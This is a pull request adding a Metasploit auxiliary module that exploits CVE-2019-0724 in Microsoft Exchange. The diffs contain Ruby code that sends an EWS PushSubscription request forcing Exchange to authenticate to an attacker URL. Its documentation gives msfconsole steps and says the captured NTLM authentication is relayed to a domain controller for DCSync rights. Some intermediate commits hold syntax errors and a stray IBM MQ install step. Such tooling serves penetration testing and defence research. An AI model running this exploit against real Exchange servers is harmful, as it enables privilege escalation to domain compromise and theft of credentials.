### PR TITLE
Added Exchange Web Services PushSubscription CVE-2019-0724 auxiliary module 

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
+++ b/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
@@ -28,6 +28,9 @@
 
   This option should contain a URL under the attacker's control. This is where the Exchange will try to authenticate.
 
+  **The PASSWORD option**
+  This can be either the password or the NTLM hash of any domain user with a mailbox configured on Exchange.
+
 ## Scenarios
 
   This module can be used to make a request to the Exchange server and force it to authenticate to a URL under our control. 

--- a/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
+++ b/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
@@ -10,18 +10,17 @@
 
 ## Verification Steps
 
-  Example steps in this format (is also in the PR):
+  Example steps:
 
-  1. Install IBM MQ Server 7.5, 8, or 9
-  2. Start msfconsole
-  3. Do: ```use auxiliary/scanner/http/exchange_web_server_pushsubscription```
-  4. Do: ```set attacker_url <url>```
-  6. Do: ```set rport <target_port>```
+  1. Start msfconsole
+  2. Do: ```use auxiliary/scanner/http/exchange_web_server_pushsubscription```
+  3. Do: ```set attacker_url <url>```
+  4. Do: ```set rport <target_port>```
   5. Do: ```set rhost <target_IP>```
   6. Do: ```set domain <domain_name>```
-  6. Do: ```set password <user_pass>```
-  6. Do: ```set username <user_pass>```
-  7. Do: ```run```
+  7. Do: ```set password <user_pass>```
+  8. Do: ```set username <user_pass>```
+  9. Do: ```run```
 
 ## Options
 

--- a/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
+++ b/documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md
@@ -1,0 +1,35 @@
+## Vulnerable Application
+
+  * Microsoft Exchange 2013 and 2016
+  * Tested on Exchange 2016
+  * Usage:
+    * Download and install Exchange Server within a Windows domain
+    * Setup a mailbox with a domain user
+    * Run the module
+    * Relay the NTLM authentication to the DC
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install IBM MQ Server 7.5, 8, or 9
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/exchange_web_server_pushsubscription```
+  4. Do: ```set attacker_url <url>```
+  6. Do: ```set rport <target_port>```
+  5. Do: ```set rhost <target_IP>```
+  6. Do: ```set domain <domain_name>```
+  6. Do: ```set password <user_pass>```
+  6. Do: ```set username <user_pass>```
+  7. Do: ```run```
+
+## Options
+
+  **The ATTACKER_URL option**
+
+  This option should contain a URL under the attacker's control. This is where the Exchange will try to authenticate.
+
+## Scenarios
+
+  This module can be used to make a request to the Exchange server and force it to authenticate to a URL under our control. 
+  An example scenario is that when this module is combined with an NTLM relay attack, if the Exchange server has the necessary permissions it is possible to grant us DCSync rights.

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
           'RPORT' => 443
         },
       'License'        => MSF_LICENSE,
-      'DisclosureDate' => 'Jan 21 2019'
+      'DisclosureDate' => '2019-01-21'
     )
 
     register_options(

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
           print_error("Server does not accept this Exchange dialect. Specify a different Exchange version")
         end
       else
-        print_error("Server returned HTTP " + res.code + ": " + xml.text)
+        print_error("Server returned HTTP #{res.code}: #{xml.text})
       end
     end
   end

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -24,8 +24,7 @@ class MetasploitModule < Msf::Auxiliary
       ]
       'Reference'      =>
          [
-           [ 'CVE-2019-0724' ],
-           [ 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
+           [ 'URL' , 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
          ],
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Jan 21 2019'

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',
       'Description'    => %q{
-        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0686
+        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724
         Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.
         This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.
         The module is based on the work by @_dirkjan,
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
       'Author'         => 'Petros Koutroumpis',
       'Reference'      =>
          [
-           [ 'CVE-2019-0686' ],
+           [ 'CVE-2019-0724' ],
            [ 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
          ],
       'License'        => MSF_LICENSE,

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange", nil ]),
+        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),
         OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user", nil ]),
         OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
         OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -5,7 +5,6 @@
 
 require 'rex/proto/ntlm/message'
 require 'rex/proto/http'
-require 'metasploit/framework/credential_collection'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -18,7 +18,10 @@ class MetasploitModule < Msf::Auxiliary
         This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.
         The module is based on the work by @_dirkjan,
       },
-      'Author'         => 'Petros Koutroumpis',
+      'Author'         => [
+        '@_dirkjan',         # Discovery and PoC
+        'Petros Koutroumpis' # Metasploit
+      ]
       'Reference'      =>
          [
            [ 'CVE-2019-0724' ],

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -22,9 +22,10 @@ class MetasploitModule < Msf::Auxiliary
         '@_dirkjan',         # Discovery and PoC
         'Petros Koutroumpis' # Metasploit
       ]
-      'Reference'      =>
+      'References'      =>
          [
-           [ 'URL' , 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
+           [ 'CVE', '2019-0724' ],
+           [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
          ],
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Jan 21 2019'

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
         The module is based on the work by @_dirkjan,
       },
       'Author'         => [
-        '@_dirkjan',         # Discovery and PoC
+        '_dirkjan',         # Discovery and PoC
         'Petros Koutroumpis' # Metasploit
       ]
       'References'      =>

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if res.code == 200
-      print_good("Exchange returned HTTP status 200 - Authentication was sucessful")
+      print_good("Exchange returned HTTP status 200 - Authentication was successful")
       if xml.text.include? "NoError"
         print_good("API call was successful")
       elsif xml.text.include? "ErrorMissingEmailAddress"

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),
-        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user", nil ]),
+        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user"]),
         OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
         OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),
         OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/ntlm/message'
+require 'rex/proto/http'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',
+      'Description'    => %q{
+        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0686
+        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.
+        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.
+        The module is based on the work by @_dirkjan,
+      },
+      'Author'         => 'Petros Koutroumpis',
+      'Reference'      =>
+         [
+           [ 'CVE-2019-0686' ],
+           [ 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
+         ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Jan 21 2019'
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, "Username for authentication", nil ]),
+        OptString.new('PASSWORD', [ true, "Password for authentication", nil ]),
+        OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
+        OptString.new('TARGETURI', [ true, "The location of the NTLM service", "/EWS/Exchange.asmx" ]),
+        OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),
+        OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ]),
+        OptBool.new('SSL', [true, "Negotiate SSL/TLS for outgoing connections", true]),
+        Opt::RPORT(443),
+      ])
+  end
+
+  def run
+
+    domain = datastore['DOMAIN']
+    uri = datastore['TARGETURI']
+    exchange_version = datastore['EXCHANGE_VERSION']
+    attacker_url = datastore['ATTACKER_URL']
+
+    req_data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\r\n"
+    req_data += "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" + "\r\n"
+    req_data += "<soap:Header>" + "\r\n"
+    req_data += "<t:RequestServerVersion Version=\"Exchange"+exchange_version+"\" />" + "\r\n"
+    req_data += "</soap:Header>" + "\r\n"
+    req_data += "<soap:Body>" + "\r\n"
+    req_data += "<m:Subscribe>" + "\r\n"
+    req_data += "<m:PushSubscriptionRequest SubscribeToAllFolders=\"true\">" + "\r\n"
+    req_data += "<t:EventTypes>" + "\r\n"
+    req_data += "<t:EventType>NewMailEvent</t:EventType>" + "\r\n"
+    req_data += "<t:EventType>ModifiedEvent</t:EventType>" + "\r\n"
+    req_data += "<t:EventType>MovedEvent</t:EventType>" + "\r\n"
+    req_data += "</t:EventTypes>" + "\r\n"
+    req_data += "<t:StatusFrequency>1</t:StatusFrequency>" + "\r\n"
+    req_data += "<t:URL>"+attacker_url+"</t:URL>" + "\r\n"
+    req_data += "</m:PushSubscriptionRequest>" + "\r\n"
+    req_data += "</m:Subscribe>" + "\r\n"
+    req_data += "</soap:Body>" + "\r\n"
+    req_data += "</soap:Envelope>" + "\r\n"
+
+    http = nil
+
+    http = Rex::Proto::Http::Client.new(
+      rhost,
+      rport.to_i,
+      {},
+      ssl,
+      ssl_version,
+      proxies,
+      datastore['USERNAME'],
+      datastore['PASSWORD']
+    )
+
+    http.set_config({ 'preferred_auth' => 'NTLM' })
+    http.set_config({ 'domain' => domain })
+    add_socket(http)
+
+
+    req = http.request_raw({
+      'uri' => uri,
+      'method' => 'POST',
+      'ctype' => 'text/xml; charset=utf-8',
+      'headers' => {
+            'Accept' => 'text/xml'
+       },
+      'data' => req_data
+    })
+
+    begin
+      res = http.send_recv(req)
+      xml = res.get_xml_document
+      http.close
+    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT, ::Rex::HostUnreachable
+      print_error("Connection failed")
+    rescue OpenSSL::SSL::SSLError, OpenSSL::Cipher::CipherError
+      print_error "SSL negotiation failed"
+    end
+
+    if res.code == 200
+      print_good("Exchange returned HTTP status 200 - Authentication was sucessful")
+      if xml.text.include? "NoError"
+        print_good("API call was successful")
+      elsif xml.text.include? "ErrorMissingEmailAddress"
+        print_error("The user does not have a mailbox associated. Try a different user.")
+      else
+        print_error("Unknown error. Response: " + xml.text)
+      end
+    elsif res.code == 401
+      print_error("Server returned HTTP status 401 - Authentication failed")
+    else
+      if res.code == 500
+        if xml.text.include? "ErrorInvalidServerVersion"
+          print_error("Server does not accept this Exchange dialect. Specify a different Exchange version")
+        end
+      else
+        print_error("Server returned HTTP " + res.code + ": " + xml.text)
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
       [
         OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),
         OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user"]),
-        OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
+        OptString.new('DOMAIN', [ true, "The Active Directory domain name"]),
         OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),
         OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),
         OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ]),

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('USERNAME', [ true, "Username for authentication", nil ]),
-        OptString.new('PASSWORD', [ true, "Password for authentication", nil ]),
+        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange", nil ]),
+        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user", nil ]),
         OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
-        OptString.new('TARGETURI', [ true, "The location of the NTLM service", "/EWS/Exchange.asmx" ]),
+        OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),
         OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),
         OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ]),
         OptBool.new('SSL', [true, "Negotiate SSL/TLS for outgoing connections", true]),

--- a/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
+++ b/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb
@@ -21,12 +21,17 @@ class MetasploitModule < Msf::Auxiliary
       'Author'         => [
         '_dirkjan',         # Discovery and PoC
         'Petros Koutroumpis' # Metasploit
-      ]
+      ],
       'References'      =>
          [
            [ 'CVE', '2019-0724' ],
            [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
          ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 443
+        },
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Jan 21 2019'
     )
@@ -38,9 +43,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('DOMAIN', [ true, "The Active Directory domain name"]),
         OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),
         OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),
-        OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ]),
-        OptBool.new('SSL', [true, "Negotiate SSL/TLS for outgoing connections", true]),
-        Opt::RPORT(443),
+        OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ])
       ])
   end
 
@@ -126,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
           print_error("Server does not accept this Exchange dialect. Specify a different Exchange version")
         end
       else
-        print_error("Server returned HTTP #{res.code}: #{xml.text})
+        print_error("Server returned HTTP #{res.code}: #{xml.text}")
       end
     end
   end


### PR DESCRIPTION
Execution of the module will force Exchange to authenticate to an specified URL over HTTP via the Exchange PushSubscription feature. This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.


